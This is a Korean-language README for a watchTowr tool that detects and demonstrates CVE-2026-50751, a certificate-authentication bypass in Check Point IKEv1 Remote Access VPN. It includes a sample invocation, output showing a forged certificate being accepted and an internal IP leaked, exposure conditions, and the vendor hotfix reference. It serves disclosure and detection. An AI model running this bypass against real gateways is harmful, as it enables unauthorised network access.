
Check Point Remote Access VPN IKEv1 인증서 인증 우회 탐지 아티팩트 생성기입니다.
https://github.com/user-attachments/assets/1280c545-364e-42d1-94ac-5b2cd850d14e
기술적 세부 사항은 블로그 게시물을 참조하세요.
$ python3 watchTowr-vs-Check-Point-CVE-2026-50751.py -rh vpn.example.com -u watchtowr
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Check-Point-CVE-2026-50751.py
(*) Check Point IKEv1 Remote-Access VPN certificate-auth bypass Detection Artifact Generator
- McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-50751]
[#] CVE-2026-50751 Check Point IKEv1 Remote-Access certificate-auth bypass
[+] Self-signed cert (untrusted); signature will be invalid (no private key)
[#] Connecting via udp ...
[#] Authenticating as 'watchtowr' with the forged certificate + invalid signature...
[#] Decrypting...
[+] Gateway Internal IP: 172.31.255.128
[+] [BYPASSED] Gateway authenticated us as 'watchtowr'. CVE-2026-50751 certificate-authentication bypass confirmed.
Python 3 및 cryptography 패키지가 필요합니다:
pip install cryptography
이 watchTowr 탐지 아티팩트 생성기는 Check Point Remote Access VPN / Mobile Access 인증 우회 CVE-2026-50751 (CVSS 9.3, CWE-287)을 탐지하고 시연합니다. 원격의 인증되지 않은 공격자는 더 이상 사용되지 않는 IKEv1 1단계 교환을 완료하고 유효한 인증서, 개인 키 또는 비밀번호 없이 프로비저닝된 Remote Access 사용자로 인증될 수 있습니다. 이는 IKE(UDP 500/4500)와 Check Point Visitor Mode / SSL(원시 TCP 443, TCPT) 모두에서 작동합니다.
게이트웨이는 레거시 IKEv1 경로로 구성된 경우 노출됩니다: 레거시 Remote Access 클라이언트가 허용되고 IKEv1이 허용됩니다(IKEv2 전용이 아님).
인증서 인증 우회는 Certificate, Certificate with enrollment, Mixed 사용자 인증 방법에 적용됩니다. 일반 Legacy(사용자 이름/비밀번호)는 우회할 수 없습니다.
완화 조치 및 추가 세부 사항은 Check Point 권고 및 핫픽스 sk185033에서 확인할 수 있습니다:
최신 보안 연구를 위해 watchTowr Labs 팀을 팔로우하세요.